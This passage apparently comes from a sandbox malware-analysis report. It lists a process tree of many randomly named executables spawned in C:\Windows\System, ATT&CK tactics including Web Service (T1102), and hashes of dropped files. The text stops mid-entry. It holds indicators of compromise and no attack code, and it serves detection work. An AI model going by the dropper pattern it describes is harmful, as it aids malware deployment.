- C:\Windows\System\asovtzQ.exe
  C:\Windows\System\asovtzQ.exe
  2⤵
  PID:13124
- C:\Windows\System\Jkbshoj.exe
  C:\Windows\System\Jkbshoj.exe
  2⤵
  PID:13144
- C:\Windows\System\IvmNxYd.exe
  C:\Windows\System\IvmNxYd.exe
  2⤵
  PID:10716
- C:\Windows\System\veYkxkA.exe
  C:\Windows\System\veYkxkA.exe
  2⤵
  PID:9152
- C:\Windows\System\qtGguUo.exe
  C:\Windows\System\qtGguUo.exe
  2⤵
  PID:8136
- C:\Windows\System\lIFakOf.exe
  C:\Windows\System\lIFakOf.exe
  2⤵
  PID:3588
- C:\Windows\System\JivgWUF.exe
  C:\Windows\System\JivgWUF.exe
  2⤵
  PID:10024
- C:\Windows\System\WvOvgdx.exe
  C:\Windows\System\WvOvgdx.exe
  2⤵
  PID:10112
- C:\Windows\System\keeoKUx.exe
  C:\Windows\System\keeoKUx.exe
  2⤵
  PID:11312
- C:\Windows\System\HZiLzWC.exe
  C:\Windows\System\HZiLzWC.exe
  2⤵
  PID:9488
- C:\Windows\System\RztifwG.exe
  C:\Windows\System\RztifwG.exe
  2⤵
  PID:10404
- C:\Windows\System\CdmIuZk.exe
  C:\Windows\System\CdmIuZk.exe
  2⤵
  PID:10428
- C:\Windows\System\tNSncrg.exe
  C:\Windows\System\tNSncrg.exe
  2⤵
  PID:12984
- C:\Windows\System\wKgEBkZ.exe
  C:\Windows\System\wKgEBkZ.exe
  2⤵
  PID:10764
- C:\Windows\System\nZojodR.exe
  C:\Windows\System\nZojodR.exe
  2⤵
  PID:13308
- C:\Windows\System\FtkhHHV.exe
  C:\Windows\System\FtkhHHV.exe
  2⤵
  PID:8116
- C:\Windows\System\LtfRFMp.exe
  C:\Windows\System\LtfRFMp.exe
  2⤵
  PID:12468
- C:\Windows\System\tBWjWBd.exe
  C:\Windows\System\tBWjWBd.exe
  2⤵
  PID:11120
- C:\Windows\System\raowSPk.exe
  C:\Windows\System\raowSPk.exe
  2⤵
  PID:12792
- C:\Windows\System\XVYguoW.exe
  C:\Windows\System\XVYguoW.exe
  2⤵
  PID:11164
- C:\Windows\System\ZnWdfxT.exe
  C:\Windows\System\ZnWdfxT.exe
  2⤵
  PID:7188
- C:\Windows\System\vwdzQqe.exe
  C:\Windows\System\vwdzQqe.exe
  2⤵
  PID:10824
- C:\Windows\System\vxqcXWd.exe
  C:\Windows\System\vxqcXWd.exe
  2⤵
  PID:3732
- C:\Windows\System\naLLCut.exe
  C:\Windows\System\naLLCut.exe
  2⤵
  PID:12244
- C:\Windows\System\HPvfWng.exe
  C:\Windows\System\HPvfWng.exe
  2⤵
  PID:12228
- C:\Windows\System\EqJvOCt.exe
  C:\Windows\System\EqJvOCt.exe
  2⤵
  PID:11320
- C:\Windows\System\UJCYciL.exe
  C:\Windows\System\UJCYciL.exe
  2⤵
  PID:9296
- C:\Windows\System\SzqspwU.exe
  C:\Windows\System\SzqspwU.exe
  2⤵
  PID:12184
- C:\Windows\System\DDbUbsU.exe
  C:\Windows\System\DDbUbsU.exe
  2⤵
  PID:12856
- C:\Windows\System\rOsnnXE.exe
  C:\Windows\System\rOsnnXE.exe
  2⤵
  PID:11020
- C:\Windows\System\kSlPXsf.exe
  C:\Windows\System\kSlPXsf.exe
  2⤵
  PID:1672
- C:\Windows\System\pshVJlc.exe
  C:\Windows\System\pshVJlc.exe
  2⤵
  PID:11052
- C:\Windows\System\ozoirBx.exe
  C:\Windows\System\ozoirBx.exe
  2⤵
  PID:1472
- C:\Windows\System\JmdIyJT.exe
  C:\Windows\System\JmdIyJT.exe
  2⤵
  PID:12824
- C:\Windows\System\WeXOLST.exe
  C:\Windows\System\WeXOLST.exe
  2⤵
  PID:2268
- C:\Windows\System\JUbuahn.exe
  C:\Windows\System\JUbuahn.exe
  2⤵
  PID:456
- C:\Windows\System\nXygtPu.exe
  C:\Windows\System\nXygtPu.exe
  2⤵
  PID:5572
- C:\Windows\System\JWOOFXY.exe
  C:\Windows\System\JWOOFXY.exe
  2⤵
  PID:13320
- C:\Windows\System\MWYAACk.exe
  C:\Windows\System\MWYAACk.exe
  2⤵
  PID:13336
- C:\Windows\System\rIygXBE.exe
  C:\Windows\System\rIygXBE.exe
  2⤵
  PID:13352
- C:\Windows\System\BkPEVGJ.exe
  C:\Windows\System\BkPEVGJ.exe
  2⤵
  PID:13368
- C:\Windows\System\JdniKZj.exe
  C:\Windows\System\JdniKZj.exe
  2⤵
  PID:13384
- C:\Windows\System\vuzQsuF.exe
  C:\Windows\System\vuzQsuF.exe
  2⤵
  PID:13400
- C:\Windows\System\qyzOHlY.exe
  C:\Windows\System\qyzOHlY.exe
  2⤵
  PID:13416
- C:\Windows\System\wCgBIBN.exe
  C:\Windows\System\wCgBIBN.exe
  2⤵
  PID:13432
- C:\Windows\System\BVJopCP.exe
  C:\Windows\System\BVJopCP.exe
  2⤵
  PID:13448
- C:\Windows\System\TzDSElY.exe
  C:\Windows\System\TzDSElY.exe
  2⤵
  PID:13464
- C:\Windows\System\qbbELjP.exe
  C:\Windows\System\qbbELjP.exe
  2⤵
  PID:13480
- C:\Windows\System\mDBdyxB.exe
  C:\Windows\System\mDBdyxB.exe
  2⤵
  PID:13496
- C:\Windows\System\bOXsAmm.exe
  C:\Windows\System\bOXsAmm.exe
  2⤵
  PID:13516
- C:\Windows\System\LlIUdCs.exe
  C:\Windows\System\LlIUdCs.exe
  2⤵
  PID:13536
- C:\Windows\System\RSELvlU.exe
  C:\Windows\System\RSELvlU.exe
  2⤵
  PID:13552
- C:\Windows\System\tcDCudM.exe
  C:\Windows\System\tcDCudM.exe
  2⤵
  PID:13568
- C:\Windows\System\tWAfEIF.exe
  C:\Windows\System\tWAfEIF.exe
  2⤵
  PID:13588
- C:\Windows\System\TzDcgPP.exe
  C:\Windows\System\TzDcgPP.exe
  2⤵
  PID:13612
- C:\Windows\System\TerTIAT.exe
  C:\Windows\System\TerTIAT.exe
  2⤵
  PID:13628
- C:\Windows\System\yGJrmiP.exe
  C:\Windows\System\yGJrmiP.exe
  2⤵
  PID:13644
- C:\Windows\System\XIHCwYG.exe
  C:\Windows\System\XIHCwYG.exe
  2⤵
  PID:13684
- C:\Windows\System\uWYKziR.exe
  C:\Windows\System\uWYKziR.exe
  2⤵
  PID:13700
- C:\Windows\System\atJSXGv.exe
  C:\Windows\System\atJSXGv.exe
  2⤵
  PID:13716
- C:\Windows\System\mPECphz.exe
  C:\Windows\System\mPECphz.exe
  2⤵
  PID:13736
- C:\Windows\System\coDlffi.exe
  C:\Windows\System\coDlffi.exe
  2⤵
  PID:13756
- C:\Windows\System\inbpzsX.exe
  C:\Windows\System\inbpzsX.exe
  2⤵
  PID:13772
- C:\Windows\System\ZyiAlVn.exe
  C:\Windows\System\ZyiAlVn.exe
  2⤵
  PID:13788
- C:\Windows\System\WKgPfEj.exe
  C:\Windows\System\WKgPfEj.exe
  2⤵
  PID:13804
- C:\Windows\System\xFEjmIa.exe
  C:\Windows\System\xFEjmIa.exe
  2⤵
  PID:13824
- C:\Windows\System\ciRVRmq.exe
  C:\Windows\System\ciRVRmq.exe
  2⤵
  PID:13840
- C:\Windows\System\unjxRdN.exe
  C:\Windows\System\unjxRdN.exe
  2⤵
  PID:13856
- C:\Windows\System\QzztwZE.exe
  C:\Windows\System\QzztwZE.exe
  2⤵
  PID:13872
- C:\Windows\System\FZFDdHk.exe
  C:\Windows\System\FZFDdHk.exe
  2⤵
  PID:13888
- C:\Windows\System\yFaKzOk.exe
  C:\Windows\System\yFaKzOk.exe
  2⤵
  PID:13904
- C:\Windows\System\LoTGiZy.exe
  C:\Windows\System\LoTGiZy.exe
  2⤵
  PID:13920
- C:\Windows\System\xbiDnrd.exe
  C:\Windows\System\xbiDnrd.exe
  2⤵
  PID:13936
- C:\Windows\System\KtxIcFj.exe
  C:\Windows\System\KtxIcFj.exe
  2⤵
  PID:13952
- C:\Windows\System\fNTRclc.exe
  C:\Windows\System\fNTRclc.exe
  2⤵
  PID:13968
- C:\Windows\System\mQNqoRF.exe
  C:\Windows\System\mQNqoRF.exe
  2⤵
  PID:13984
- C:\Windows\System\jxpgzFm.exe
  C:\Windows\System\jxpgzFm.exe
  2⤵
  PID:14000
- C:\Windows\System\MizXoxP.exe
  C:\Windows\System\MizXoxP.exe
  2⤵
  PID:14024
- C:\Windows\System\OuZpcBz.exe
  C:\Windows\System\OuZpcBz.exe
  2⤵
  PID:14040
- C:\Windows\System\qvqzAqd.exe
  C:\Windows\System\qvqzAqd.exe
  2⤵
  PID:14056
- C:\Windows\System\WDmlrIL.exe
  C:\Windows\System\WDmlrIL.exe
  2⤵
  PID:14072
- C:\Windows\System\yuXWGmB.exe
  C:\Windows\System\yuXWGmB.exe
  2⤵
  PID:14088
- C:\Windows\System\JBQiWpr.exe
  C:\Windows\System\JBQiWpr.exe
  2⤵
  PID:14104
- C:\Windows\System\QWUzbnL.exe
  C:\Windows\System\QWUzbnL.exe
  2⤵
  PID:14120
- C:\Windows\System\AXVPKko.exe
  C:\Windows\System\AXVPKko.exe
  2⤵
  PID:14136
- C:\Windows\System\SVVBQzp.exe
  C:\Windows\System\SVVBQzp.exe
  2⤵
  PID:14152
- C:\Windows\System\ufsmwOu.exe
  C:\Windows\System\ufsmwOu.exe
  2⤵
  PID:14168
- C:\Windows\System\ZcuaIFs.exe
  C:\Windows\System\ZcuaIFs.exe
  2⤵
  PID:14184
- C:\Windows\System\MyIQeZs.exe
  C:\Windows\System\MyIQeZs.exe
  2⤵
  PID:14200
- C:\Windows\System\ELceuay.exe
  C:\Windows\System\ELceuay.exe
  2⤵
  PID:14216
- C:\Windows\System\hLWTOFs.exe
  C:\Windows\System\hLWTOFs.exe
  2⤵
  PID:14232
- C:\Windows\System\YJSMNeJ.exe
  C:\Windows\System\YJSMNeJ.exe
  2⤵
  PID:14248
- C:\Windows\System\VZEjXmV.exe
  C:\Windows\System\VZEjXmV.exe
  2⤵
  PID:14264
- C:\Windows\System\bKdeIZo.exe
  C:\Windows\System\bKdeIZo.exe
  2⤵
  PID:14280
- C:\Windows\System\oBItRuP.exe
  C:\Windows\System\oBItRuP.exe
  2⤵
  PID:14296
- C:\Windows\System\hkLQIcV.exe
  C:\Windows\System\hkLQIcV.exe
  2⤵
  PID:14312
- C:\Windows\System\xFRSzjH.exe
  C:\Windows\System\xFRSzjH.exe
  2⤵
  PID:14328
- C:\Windows\System\tcjPgdG.exe
  C:\Windows\System\tcjPgdG.exe
  2⤵
  PID:13024
- C:\Windows\System\IBfVkft.exe
  C:\Windows\System\IBfVkft.exe
  2⤵
  PID:10944
- C:\Windows\System\GeFtvNg.exe
  C:\Windows\System\GeFtvNg.exe
  2⤵
  PID:1932
- C:\Windows\System\ZqCACyo.exe
  C:\Windows\System\ZqCACyo.exe
  2⤵
  PID:3904
- C:\Windows\System\EKdLaSs.exe
  C:\Windows\System\EKdLaSs.exe
  2⤵
  PID:13328
- C:\Windows\System\VZgEGjl.exe
  C:\Windows\System\VZgEGjl.exe
  2⤵
  PID:13360
- C:\Windows\System\yACwuNo.exe
  C:\Windows\System\yACwuNo.exe
  2⤵
  PID:7292
- C:\Windows\System\PAmNSBM.exe
  C:\Windows\System\PAmNSBM.exe
  2⤵
  PID:6892
- C:\Windows\System\gtbEhzI.exe
  C:\Windows\System\gtbEhzI.exe
  2⤵
  PID:9300
- C:\Windows\System\ErSVhnj.exe
  C:\Windows\System\ErSVhnj.exe
  2⤵
  PID:4216
- C:\Windows\System\JpBZAou.exe
  C:\Windows\System\JpBZAou.exe
  2⤵
  PID:4632
- C:\Windows\System\LbhHtMO.exe
  C:\Windows\System\LbhHtMO.exe
  2⤵
  PID:5852
- C:\Windows\System\caXEpLL.exe
  C:\Windows\System\caXEpLL.exe
  2⤵
  PID:13376
- C:\Windows\System\aTRBzZP.exe
  C:\Windows\System\aTRBzZP.exe
  2⤵
  PID:13408
- C:\Windows\System\AJAflId.exe
  C:\Windows\System\AJAflId.exe
  2⤵
  PID:13440
- C:\Windows\System\ZicwaOV.exe
  C:\Windows\System\ZicwaOV.exe
  2⤵
  PID:13476
- C:\Windows\System\TVSJJyL.exe
  C:\Windows\System\TVSJJyL.exe
  2⤵
  PID:13504
- C:\Windows\System\MXDXOeo.exe
  C:\Windows\System\MXDXOeo.exe
  2⤵
  PID:13548
- C:\Windows\System\OiAFVXV.exe
  C:\Windows\System\OiAFVXV.exe
  2⤵
  PID:13580
- C:\Windows\System\ZujmcLN.exe
  C:\Windows\System\ZujmcLN.exe
  2⤵
  PID:13620
- C:\Windows\System\UlmMEeu.exe
  C:\Windows\System\UlmMEeu.exe
  2⤵
  PID:13660
- C:\Windows\System\IRSgNol.exe
  C:\Windows\System\IRSgNol.exe
  2⤵
  PID:13708
- C:\Windows\System\kkcjYfS.exe
  C:\Windows\System\kkcjYfS.exe
  2⤵
  PID:13744
- C:\Windows\System\nRyEVMS.exe
  C:\Windows\System\nRyEVMS.exe
  2⤵
  PID:13768
- C:\Windows\System\AKjjZld.exe
  C:\Windows\System\AKjjZld.exe
  2⤵
  PID:13820
- C:\Windows\System\nMiywNI.exe
  C:\Windows\System\nMiywNI.exe
  2⤵
  PID:13848
- C:\Windows\System\mqonwbE.exe
  C:\Windows\System\mqonwbE.exe
  2⤵
  PID:13880
- C:\Windows\System\kPCmHpv.exe
  C:\Windows\System\kPCmHpv.exe
  2⤵
  PID:13896
- C:\Windows\System\AJkOjER.exe
  C:\Windows\System\AJkOjER.exe
  2⤵
  PID:13944
- C:\Windows\System\dFurMjr.exe
  C:\Windows\System\dFurMjr.exe
  2⤵
  PID:13976
- C:\Windows\System\QuGaWcH.exe
  C:\Windows\System\QuGaWcH.exe
  2⤵
  PID:14008
- C:\Windows\System\BoGSPvI.exe
  C:\Windows\System\BoGSPvI.exe
  2⤵
  PID:14048
- C:\Windows\System\AjshQkT.exe
  C:\Windows\System\AjshQkT.exe
  2⤵
  PID:14080
- C:\Windows\System\MwXVUPH.exe
  C:\Windows\System\MwXVUPH.exe
  2⤵
  PID:14112
- C:\Windows\System\nDWIzcg.exe
  C:\Windows\System\nDWIzcg.exe
  2⤵
  PID:14144
- C:\Windows\System\gysizFq.exe
  C:\Windows\System\gysizFq.exe
  2⤵
  PID:14176
- C:\Windows\System\OlTmdDA.exe
  C:\Windows\System\OlTmdDA.exe
  2⤵
  PID:14208
- C:\Windows\System\aMdEZsw.exe
  C:\Windows\System\aMdEZsw.exe
  2⤵
  PID:14240
- C:\Windows\System\UbqMghF.exe
  C:\Windows\System\UbqMghF.exe
  2⤵
  PID:14272
- C:\Windows\System\veeFOpr.exe
  C:\Windows\System\veeFOpr.exe
  2⤵
  PID:14304
- C:\Windows\System\vkfDSrj.exe
  C:\Windows\System\vkfDSrj.exe
  2⤵
  PID:12488
- C:\Windows\System\jPCOvor.exe
  C:\Windows\System\jPCOvor.exe
  2⤵
  PID:1356
- C:\Windows\System\njbXFSv.exe
  C:\Windows\System\njbXFSv.exe
  2⤵
  PID:10496
- C:\Windows\System\FcCCUDd.exe
  C:\Windows\System\FcCCUDd.exe
  2⤵
  PID:13584
- C:\Windows\System\kRqQGxp.exe
  C:\Windows\System\kRqQGxp.exe
  2⤵
  PID:12616
- C:\Windows\System\vQHBVJR.exe
  C:\Windows\System\vQHBVJR.exe
  2⤵
  PID:3944
- C:\Windows\System\waKKStk.exe
  C:\Windows\System\waKKStk.exe
  2⤵
  PID:1144
- C:\Windows\System\XHganer.exe
  C:\Windows\System\XHganer.exe
  2⤵
  PID:13424
- C:\Windows\System\SDiTIQX.exe
  C:\Windows\System\SDiTIQX.exe
  2⤵
  PID:13488
- C:\Windows\System\DqujRFq.exe
  C:\Windows\System\DqujRFq.exe
  2⤵
  PID:13560
- C:\Windows\System\JcZmLwe.exe
  C:\Windows\System\JcZmLwe.exe
  2⤵
  PID:13636
- C:\Windows\System\NEetuPg.exe
  C:\Windows\System\NEetuPg.exe
  2⤵
  PID:13728
- C:\Windows\System\kJStvGG.exe
  C:\Windows\System\kJStvGG.exe
  2⤵
  PID:13796
- C:\Windows\System\KdFtkZM.exe
  C:\Windows\System\KdFtkZM.exe
  2⤵
  PID:13868
- C:\Windows\System\jyEcKcG.exe
  C:\Windows\System\jyEcKcG.exe
  2⤵
  PID:13912
- C:\Windows\System\CHqpziF.exe
  C:\Windows\System\CHqpziF.exe
  2⤵
  PID:13992
- C:\Windows\System\nZiZFwg.exe
  C:\Windows\System\nZiZFwg.exe
  2⤵
  PID:14064
- C:\Windows\System\GukHkyd.exe
  C:\Windows\System\GukHkyd.exe
  2⤵
  PID:14132
- C:\Windows\System\PCUwPUO.exe
  C:\Windows\System\PCUwPUO.exe
  2⤵
  PID:14192
- C:\Windows\System\rfWypdL.exe
  C:\Windows\System\rfWypdL.exe
  2⤵
  PID:14256
- C:\Windows\System\YZIoCpZ.exe
  C:\Windows\System\YZIoCpZ.exe
  2⤵
  PID:14324
- C:\Windows\System\vlsonJx.exe
  C:\Windows\System\vlsonJx.exe
  2⤵
  PID:3940
- C:\Windows\System\opiOKFd.exe
  C:\Windows\System\opiOKFd.exe
  2⤵
  PID:12716
- C:\Windows\System\SrJUCII.exe
  C:\Windows\System\SrJUCII.exe
  2⤵
  PID:13316
- C:\Windows\System\oTzsizI.exe
  C:\Windows\System\oTzsizI.exe
  2⤵
  PID:13524
- C:\Windows\System\GLfrqco.exe
  C:\Windows\System\GLfrqco.exe
  2⤵
  PID:13696
- C:\Windows\System\RYWIzPw.exe
  C:\Windows\System\RYWIzPw.exe
  2⤵
  PID:13832
- C:\Windows\System\HvyMgWF.exe
  C:\Windows\System\HvyMgWF.exe
  2⤵
  PID:13964
- C:\Windows\System\ULGNafs.exe
  C:\Windows\System\ULGNafs.exe
  2⤵
  PID:14100
- C:\Windows\System\UQVVbDG.exe
  C:\Windows\System\UQVVbDG.exe
  2⤵
  PID:7768
- C:\Windows\System\xOncfxe.exe
  C:\Windows\System\xOncfxe.exe
  2⤵
  PID:13460
- C:\Windows\System\aJbEujE.exe
  C:\Windows\System\aJbEujE.exe
  2⤵
  PID:13960
- C:\Windows\System\GQHUuWD.exe
  C:\Windows\System\GQHUuWD.exe
  2⤵
  PID:5128
- C:\Windows\System\kWOOgVn.exe
  C:\Windows\System\kWOOgVn.exe
  2⤵
  PID:14096
- C:\Windows\System\ocGFPeI.exe
  C:\Windows\System\ocGFPeI.exe
  2⤵
  PID:14340
- C:\Windows\System\FrfdbNi.exe
  C:\Windows\System\FrfdbNi.exe
  2⤵
  PID:14356
- C:\Windows\System\oHXtdjI.exe
  C:\Windows\System\oHXtdjI.exe
  2⤵
  PID:14372
- C:\Windows\System\bvcCKQv.exe
  C:\Windows\System\bvcCKQv.exe
  2⤵
  PID:14392
- C:\Windows\System\iORmAtV.exe
  C:\Windows\System\iORmAtV.exe
  2⤵
  PID:14408
- C:\Windows\System\gmVISsB.exe
  C:\Windows\System\gmVISsB.exe
  2⤵
  PID:14428
- C:\Windows\System\bXtdDGO.exe
  C:\Windows\System\bXtdDGO.exe
  2⤵
  PID:14452
- C:\Windows\System\fvwhjvu.exe
  C:\Windows\System\fvwhjvu.exe
  2⤵
  PID:14480
- C:\Windows\System\XjyEvAy.exe
  C:\Windows\System\XjyEvAy.exe
  2⤵
  PID:14496
- C:\Windows\System\cOHpGmf.exe
  C:\Windows\System\cOHpGmf.exe
  2⤵
  PID:14512
- C:\Windows\System\MlxLvfA.exe
  C:\Windows\System\MlxLvfA.exe
  2⤵
  PID:14528
- C:\Windows\System\LnqKFkz.exe
  C:\Windows\System\LnqKFkz.exe
  2⤵
  PID:14544
- C:\Windows\System\opQrUzP.exe
  C:\Windows\System\opQrUzP.exe
  2⤵
  PID:14560
- C:\Windows\System\NogmXgR.exe
  C:\Windows\System\NogmXgR.exe
  2⤵
  PID:14576
- C:\Windows\System\IkvQqHb.exe
  C:\Windows\System\IkvQqHb.exe
  2⤵
  PID:14592
- C:\Windows\System\IhoWOgG.exe
  C:\Windows\System\IhoWOgG.exe
  2⤵
  PID:14608
- C:\Windows\System\YyFpBKS.exe
  C:\Windows\System\YyFpBKS.exe
  2⤵
  PID:14624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0eamte3g.gig.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\AawnHPI.exe

Filesize
1.9MB

MD5
8ec307e45b01b8dd1400834892994157

SHA1
30b6d067224409543168121629f1e37cf2ccb553

SHA256
f7221f45cdf94d541cd102a7afa22c7dbdae38959251f271fbaeb8450d95603a

SHA512
51bd34b8e76e6a58d72f4d8d17ce7b781592e5af6d492145ba6fabdfc7fa3fd56bc2c0c5b75e5315f8d66bc5e0d6e3a5004f4e723859b3801066fcc2c75ee48d

Download Submit
C:\Windows\System\AbXspXc.exe

Filesize
1.9MB

MD5
d24bc1453c76f597b6778fb07e64fffa

SHA1
fb50530813b6ab1de30c0a516c7cf9b6c1aacf89

SHA256
299d75cca63b61d3976443d8b857b54a731fde11a6e31d320e075e1eb227c892

SHA512
ea8874b0ce95cfdf80b379cb204e352047cc517bfe871b63402e424714ee613b95c333ac6accbb793a06137c831d64271791c3901544b19ef2dfd214a25acbf8

Download Submit
C:\Windows\System\DUWcqkt.exe

Filesize
1.9MB

MD5
c8628b5646ac7b28e202345f90432be1

SHA1
fb1bca21c28f5d748131b1d6b9a90755d9583e2b

SHA256
8a3ea08d715c04cf4603d85b0dee10a5c7e316d1005c94da5b05d2f555937dc6

SHA512
3e8f79515a5c2ffeb64c2ee29c2891e700cf2e1ad5c1aa9df91db712d3b4019198d36208f325ecab918cb27dde4fac86a6778b5350b3f1ed07e1abcfbbe65af8

Download Submit
C:\Windows\System\DuzUITB.exe

Filesize
1.9MB

MD5
9dc702498253c3dba786a5e6f2bd14a5

SHA1
b79aa1c3ead303aba507a63cf9e5ff011b4a901f

SHA256
e29df403f07bb403543df1599b9db3fd13acc3a81a51e3cdd4f5a86f86cb8db4

SHA512
aec5f5010f37d48afe5ceac0f6383b4a11c0f238517de4922a9fef1ba3ff2298249b6603d1aceeaf15816d41f84df43a724e6fc74d14588d93c5cde263e64cec

Download Submit
C:\Windows\System\FFSUkbb.exe

Filesize
1.9MB

MD5
a98af307732e7dcfdc8672dd03355389

SHA1
0819471c10b7a034cc1c14fee025b9ca3310f866

SHA256
c09b73464f5a2baa2f0e42244079becd28085843c634a77aab1afa6e111f574d

SHA512
9e91bf7a4634730a2e99b703198b58357790c29be80124c67494bb149dfe554301e38d3c3d2c85a220d6f27372d47013c12e8895afc74306a4627bc4cc2c9d71

Download Submit
C:\Windows\System\GfitUzY.exe

Filesize
1.9MB

MD5
638373b8270398cda02f538b7e4a90c8

SHA1
f5b2a2b7b6e63fdc8bf8c15a4da4f97616b26556

SHA256
b45849dd6d2aee43b34a9ddd62fd2f00270f363ee62158ae2d234c57711b674c

SHA512
ea82ad607ecca9543ef5d8e4c1fb082ca5e31abe7596c247b5f1277462ee5c554acced8049c8d20bdfd5f75cca56563abaac698d7fcd59ea534a3dfec5bc1890

Download Submit
C:\Windows\System\GrDNtzB.exe

Filesize
1.9MB

MD5
5a0079af2842c310727630936894ec01

SHA1
1de6df4ecff663991461e39bcf572efe386f8b74

SHA256
2cdd456682a3c635cb605cd148ac35ef2222496d607ce21fed1c3fdb640f91bb

SHA512
d9daa8040db7038f30d52273293dea32329f913b7e7018161766ade53a2c6f2384d13ec574e88264e3bd9a2d2339292b390af43460829a618589008dc62a2df3

Download Submit
C:\Windows\System\KQjIAsa.exe

Filesize
8B

MD5
7e1e9fcc71af27d4f3a70b3e20ac77b9

SHA1
09ec64762a6dbe9e03ecdb61ea5de2d274d170f0

SHA256
2f18658787aeca4d305f9fde7c9bc7343e5969bd51ec0e2c8583a2e506b9b404

SHA512
3beada4b1cd8ead153972e6e1293d504f7cea2d7323223a87897681d13a0872baba6942b9d88c8943892c0ad02e1f51ed3730edd702cc7d53ab31d006770ca91

Download Submit
C:\Windows\System\Kpbszdv.exe

Filesize
1.9MB

MD5
6c96335714f88faea098eb5bc47d61cb

SHA1
94cf1b9a6f280e917ecb2fc240c65ff11895e1cf

SHA256
d74822b89562c1f15845f632db06425a69ce23ab92c0aefd3cb12f80210974a6

SHA512
4dfdfa60c24fe15b47264b3f1b7c27c20a5ae587557dece6134cec0d4ac34f8f357f8ee5a8946c9ab93758d36563a310f34ff9a002602e03d06c419b3417f95b

Download Submit
C:\Windows\System\LKeGQuk.exe

Filesize
1.9MB

MD5
4570891211c8cd26fa31f167a7e8178a

SHA1
2a2d6e7128519b579f4f17aea529caeddf3aa7e5

SHA256
207a1a33bae5c8dbeef3ef6590e069c088471dd0e70a939435c14d2aeecac8c3

SHA512
9862302b9dffc00487396d04392ba50ce9aad5f2b505c91a3b0007dec4765d2d0cff8d9b7f10fb82ddf8578898473a42b6bae8f681fe0ea2f37cc0504cf2c36e

Download Submit
C:\Windows\System\MJpdcGx.exe

Filesize
1.9MB

MD5
7d88bf9e759c84f99aaa06618a46a7b1

SHA1
cf99f67d6656695ac81c397c3abf9e93fe2bde06

SHA256
6ec34cbdd1ffafba11cd7d991791b8a993a55921aa21ce673dfd47f4b82d946f

SHA512
519a329bf5d178032121ead29b094ff2c8147a486f9dff38a8280eb08b897f3890099e747da0fbd48437afe41e946bedd9ffc83db8edbbed310d6e608f725c61

Download Submit
C:\Windows\System\QLFbOQW.exe

Filesize
1.9MB

MD5
efd79605d1f533fc4bb8aef9a4fc7b01

SHA1
8c183dcca5377e0eaa17721fb2e86d17da5a7da4

SHA256
e5ec79faf1dfbf117f7fa3abbb3308f28a1aaef175d2c2306de7a1b76ae6b03f

SHA512
d7066f8809221997ace43b193624bae900c7262c9674a24f95f7d825b65d4faa4b426e1de3c2db380f0ed187f48a0adbcd67ff1ff73c9ef7c1fc46aad6581d1e

Download Submit
C:\Windows\System\RTmwvmb.exe

Filesize
1.9MB

MD5
4646e7013b6400442622abc12747ca23

SHA1
97e280335bb1873350befccdd282843e4ee97f28

SHA256
10a3980814569380056c2e207bcb8054c75738c52e43509ef4d4fce356188846

SHA512
7dce733198bdd07b853716da4863a81d4193aeff3c3e6e6972ee4c6d4c90a69cbe785d4fc345500ef0058c55f20195e71a264ec489a62a118a7cecac058d5c92

Download Submit
C:\Windows\System\TZKOASJ.exe

Filesize
1.9MB

MD5
1ec208bc027b92a431cca716b7082d26

SHA1
7ad050109f087e0e2fa25b20c859122c526781e2

SHA256
138a00f28df0d519f2e6078eec0ef4ee81344d80564de804fc7e3ff5a4bbcbe9

SHA512
2d14e40284b126c0f8ba1a0194e562593bc06c58f93cce3b0c1524b70527dd2656dac962201b9695c10c937b9b64524c13f01fd60e5444f0a6e97d3b77ccae39

Download Submit
C:\Windows\System\UPxOfyF.exe

Filesize
1.9MB

MD5
48280d0d86e876503eb9e6c8b9b6574a

SHA1
237d2c2fb14982bf07ba7556445d70c50815f88b

SHA256
9aabe816874d39248450f3402c31d0699215deabc46f968f4a2f3e19f21e35b0

SHA512
4bd972a015cd776d272eb941c97dd0ed6c42d88f0e357865a0c7371e27d865b59357678357f8321793ed40b9ba623958b1bb05eaf833057653376cb87eeef0b9

Download Submit
C:\Windows\System\WPiWtiF.exe

Filesize
1.9MB

MD5
3fa0d7777e2674e9a90649d32cf307d2

SHA1
613068cda312b708d477f2a641e7e6464bcc505d

SHA256
a157266a032fc77a081d32837fdfbcee87c0226cd7b66e58995031b64f3ee3ad

SHA512
c94c766a13e2f9772cf4add246db464cc1e1b81c86531d1720b7d701059b7164fb162fd8ee28d341b9216c5e306a4f8507b85059b62c8109062dbfbeb5286ed2

Download Submit
C:\Windows\System\WmyNIGt.exe

Filesize
1.9MB

MD5
81edc567530d98f6a2a07820abd6a81f

SHA1
cc46e58bfb1571400110153ee215e18fecf4f45a

SHA256
d54c65ec54c16a51a928b822383e4dae237db569e020962a23b7caeb093cad82

SHA512
412bff71d3a8b018efbcda4d3697241d6d0a17b5fcf8ad792ebbcc9b631d0398e4ccba2b0790f9e6ba3e74dbe3793472ca85c70bcc2064c5ee159e3f45af3347

Download Submit
C:\Windows\System\WxJJooa.exe

Filesize
1.9MB

MD5
037dda162474f21a04519bcaa8c3cb1c

SHA1
06ac7aa809b1eb019c356b4b11be0638555b01ed

SHA256
53cc13bafa7a8b79fdb8b778139c9eeb8c8562143bef3eb1dc72b3ac97e18dd5

SHA512
1ff57cad6c6a634d747ee4b8264ba0628d1cc304c220fed5f408dd22e769057e6ddb96f95d5efdf1447cc7d382bbe5a7184bc270d873a554183dad8b1ab2cb2a

Download Submit
C:\Windows\System\aMsfuTv.exe

Filesize
1.9MB

MD5
0abdd02a8d85225f45bea907dee10139

SHA1
452143a20bb7767b71c07d9b6ac27570c57d4b64

SHA256
f063eeba3478b69ae6667503dfe05ef4260519b708a81feae18d0f6e993819ce

SHA512
c8c0d8f065e03b4e9d586c7947c31df06cf55726d234e8860827c52cddd21e39242f8f442e441326775def6dd0a1113c1094171c9b3871b1a71c669e49f8f58c

Download Submit
C:\Windows\System\cYoGInS.exe

Filesize
1.9MB

MD5
